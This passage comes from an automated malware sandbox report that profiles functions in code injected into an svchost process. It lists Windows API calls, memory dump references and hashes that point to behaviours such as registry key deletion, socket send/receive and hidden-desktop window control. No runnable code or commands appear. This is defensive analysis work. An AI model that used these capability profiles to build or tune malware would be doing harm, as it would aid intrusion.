                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9141A
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C91446
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9146D
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C91498
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: b4dff937ac0acb0b2cad3f162900a08a925a72fe8507e87805c34bf876e53a55
                                                                                                                                                                                                              • Instruction ID: 3df418f27b59e6cf7fdb1cf524680eec41ed60a1b78905511fbb1dd5b9f4fd56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4dff937ac0acb0b2cad3f162900a08a925a72fe8507e87805c34bf876e53a55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A631D7B1D01209AFDB40CFA8D885AEEBBF9FF4C304F50856AE918E7240E37499418F90
                                                                                                                                                                                                              Function 02CB51F0 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,02CA369B,00000000,00010108,?,00000000), ref: 02CB522F
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02CB5264
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CB528E
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(00000104,02CA369B), ref: 02CB52A6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CB52B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                              • Opcode ID: 73dfcad78fcbebec94101eaaf9a070d624a0624dbfbd6c0aeadef1331d669cba
                                                                                                                                                                                                              • Instruction ID: 2b1f8d446daa69d77749dec07dd4f9bb632a6be9ecb0e01ee53ea1837bfcd1df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dfcad78fcbebec94101eaaf9a070d624a0624dbfbd6c0aeadef1331d669cba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7921C876E41218ABDB21DA98DC44FEAB7BCEF84790F448655FD40EB240D6B0AE048BD0
                                                                                                                                                                                                              Function 02C918B0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2377537114-0
                                                                                                                                                                                                              • Opcode ID: 4fe419e364e84257ffc5ccffc7c456a1daf0fdc55bec08362426594151285da6
                                                                                                                                                                                                              • Instruction ID: e9d76a9ae90bb9ee59f4fad2a2d638d637dce771694edb89b6f06d8fb2943707
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fe419e364e84257ffc5ccffc7c456a1daf0fdc55bec08362426594151285da6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B2181B0A0020A9FDB14CF59D485B6ABBE5FF89344F14892DE94EC3300D7B1A660CB95
                                                                                                                                                                                                              Function 02C95940 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C95962
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02C95995
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02C959C1
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02C959E8
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C95A04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 1f1f297d344222bd51b00c4435a6ff1eabadb2159585e0c57a3a4e019c095061
                                                                                                                                                                                                              • Instruction ID: 79ed7b0be58802a683a2848ddc8a57ef27ad5e366bd51c3b9b38d5bf1b1cacd2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f1f297d344222bd51b00c4435a6ff1eabadb2159585e0c57a3a4e019c095061
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73319BB5D4120DEFDB40CFA8D985AEEBBF5FB48340F50456AE914E7240E7749A148F90
                                                                                                                                                                                                              Function 02CAAA20 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,02CA0AA8,000000FF,00000000,00000000,00000000,00000000,74DEF380,?,?,02CA0AA8,?), ref: 02CAAA37
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02CA0AA8,?), ref: 02CAAA54
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02CA0AA8,?), ref: 02CAAA5B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAAA6B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,02CA0AA8,000000FF,00000000,00000000,00000000,00000000,?,02CA0AA8,?), ref: 02CAAA88
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 913929354-0
                                                                                                                                                                                                              • Opcode ID: 32804ff80fd7af7ff300106bd32264dd879c46c27453051e1a6e84c8513a8252
                                                                                                                                                                                                              • Instruction ID: 90ecf2092f4ec860dd267ca643b6292d9e69f0ba3217fa3b020bd24663dc14ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32804ff80fd7af7ff300106bd32264dd879c46c27453051e1a6e84c8513a8252
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2601A2726823227BE63149A99C48FA73BACDF86BF5F540310BA15EA1C4DB60DD01C6F4
                                                                                                                                                                                                              Function 02C96BB9 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96C21
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C96C5C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3057210225-0
                                                                                                                                                                                                              • Opcode ID: e7536d9ebcc44799b19b968b2fd24680c4ffc87095cb935fe53e2f6ea8bcf299
                                                                                                                                                                                                              • Instruction ID: 6a372a6093db421148ab250cc2c9a77f1ee3d933eb63705379e45f205096d730
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7536d9ebcc44799b19b968b2fd24680c4ffc87095cb935fe53e2f6ea8bcf299
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33112B71E462585BEB2A97349D4DBDD376CEB08704F500AA8FB45D21C0D7B0CA94C6D1
                                                                                                                                                                                                              Function 02CA9970 Relevance: 7.6, APIs: 5, Instructions: 52networkmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,74D723A0,?,?), ref: 02CA998D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA9994
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02CA99AF
                                                                                                                                                                                                              • send.WS2_32(?,?,00000000,00000000), ref: 02CA99C0
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02CA99D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaprecv$FreeProcesssend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2415998009-0
                                                                                                                                                                                                              • Opcode ID: 5e0c6abdd64a67bf2969c7fef64fbd7fc165ad319e8dc2265eb6ce06d1179850
                                                                                                                                                                                                              • Instruction ID: afdb49f29d08c023fca486a91a69b9d64f2112dda762d10238f50e298185434c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0c6abdd64a67bf2969c7fef64fbd7fc165ad319e8dc2265eb6ce06d1179850
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A701D4B26412147BE7209B788C46FAB7B6CAF89744F444195FB08EB181D674EA41CBF4
                                                                                                                                                                                                              Function 02C9D230 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000), ref: 02C9D242
                                                                                                                                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C9D259
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C9D26F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9D280
                                                                                                                                                                                                              • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02C9D297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1270303404-0
                                                                                                                                                                                                              • Opcode ID: 488eff9aa5b2e23d929fe9a649a327b383cccfa459993694c2a0c91992dfefa1
                                                                                                                                                                                                              • Instruction ID: d85eb9e84a7b63442c1c5a68c909b28c088db9d930c4376ba40fc5c373669810
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 488eff9aa5b2e23d929fe9a649a327b383cccfa459993694c2a0c91992dfefa1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24013175982218BBEB20EB90DC09FEE7B6CAB05785F400694FA05E61C0D7F05A948BE5
                                                                                                                                                                                                              Function 02C9E380 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,?,00000000,74DF3080,?,02C9922C,?,00000006,00000000), ref: 02C9E38C
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C9E3A3
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C9E3A6
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000006,?,02C9922C), ref: 02C9E3BD
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 02C9E3C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3855296974-0
                                                                                                                                                                                                              • Opcode ID: c8441a4a65862bfcb31927286ad4c06c649dfca26657ba61eea7025e4adb783f
                                                                                                                                                                                                              • Instruction ID: cae630f546d8276005ef16ee9140f2ea8547c82d09d527e51ffd81bba51e08ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8441a4a65862bfcb31927286ad4c06c649dfca26657ba61eea7025e4adb783f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BF0F476A82218BBD721AA69DC44F6B779CEBD8760F014615FE04D7340D6B0ED118AB0
                                                                                                                                                                                                              Function 02C9D2B0 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9D2BC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9D2C4
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C9D2D0
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000000D,?,?), ref: 02C9D2E1
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C9D2ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2643679612-0
                                                                                                                                                                                                              • Opcode ID: a1d5814312d5bf0d2107617e7f4eeda9981708d22716dab1a6dd7c552223ac32
                                                                                                                                                                                                              • Instruction ID: 8d0556d58059b95399dfa88562065a153604afccd44a2e01288184d8c4c3a993
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d5814312d5bf0d2107617e7f4eeda9981708d22716dab1a6dd7c552223ac32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF06C766823047FD3105BA5EC8DFABBF6CEB497A2F504916FA05D7241C670A810C771
                                                                                                                                                                                                              Function 02C9E340 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9E34A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9E352
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02C99F24,?,?,?,?,02C99400,?,?), ref: 02C9E364
                                                                                                                                                                                                              • GetFocus.USER32 ref: 02C9E366
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02C99F24,?,?,?,?,02C99400,?,?), ref: 02C9E373
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 968181190-0
                                                                                                                                                                                                              • Opcode ID: 4ac1595110900ff5de39dfae908fe42dd5109de640a72c154354137270dc3bb9
                                                                                                                                                                                                              • Instruction ID: 645a22b75e1c94e4a40fcf57964a95ccb5ae43231c47ebdc610255e11aa3a0f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ac1595110900ff5de39dfae908fe42dd5109de640a72c154354137270dc3bb9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7E09271E82304BBD61057A6AC4DFABBBACEB857A2F900555FA08D3240D671AC1086B5
                                                                                                                                                                                                              Function 02C97980 Relevance: 7.5, APIs: 5, Instructions: 20COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,02CA8E9D,?,?,?,?,?,?), ref: 02C97987
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C97992
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C9799A
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C979A5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C979AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1233776721-0
                                                                                                                                                                                                              • Opcode ID: 0d77d5873bab947444c3cebf400ccf6bf11687dc4ed5f399024abce5ade86066
                                                                                                                                                                                                              • Instruction ID: 64453ecf587efee738c11ba119a29022a0a41b944dec38a45c201b517bdcf4a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d77d5873bab947444c3cebf400ccf6bf11687dc4ed5f399024abce5ade86066
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05D05E71EA31109FDB122B32EC0C73E7668FF8AB96B890A19FC02E1140DF34C216C665
                                                                                                                                                                                                              Function 02CC41D0 Relevance: 6.3, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC41EB
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC41FD
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC420F
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC4221
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC422B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: e90e20c4f6abc591697983756e2129cb84ee51be565600c671708d78d50513bc
                                                                                                                                                                                                              • Instruction ID: a8f07ac914eba6ed0216352ebef1e9c58283f22da985b5bc10957aa0be1ea716
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e90e20c4f6abc591697983756e2129cb84ee51be565600c671708d78d50513bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B90152F2A417815BD734DFA998E281BB6E56D84108369C83ED1DFC7A08D331FA489711
                                                                                                                                                                                                              Function 02CC13A0 Relevance: 6.3, APIs: 4, Instructions: 287COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CC13F9
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02CC1405
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CC14AC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02CC14B8
                                                                                                                                                                                                                • Part of subcall function 02CC0EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02CC0F50
                                                                                                                                                                                                                • Part of subcall function 02CC0EA0: closesocket.WS2_32(?), ref: 02CC0F6D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 403730927-0
                                                                                                                                                                                                              • Opcode ID: cca8cf01a48558fbf5c09fd508d15a6e4a106e2f56ab108f62b6bf01c606b4dd
                                                                                                                                                                                                              • Instruction ID: 8db3ab227853e9df05f2aad7033ad6a85bb408252b4558482f7a72ea3015e08f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cca8cf01a48558fbf5c09fd508d15a6e4a106e2f56ab108f62b6bf01c606b4dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77B19372E046068FCB08CF29D990AE577A6EF84301F1885BDED0E9F346D775A911CBA0
                                                                                                                                                                                                              Function 02CC4EF0 Relevance: 6.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 948496778-0
                                                                                                                                                                                                              • Opcode ID: ea368782c83eb8d9fb4fe4d63da277147c5c130fe3bb9713448244e84e3ee2fe
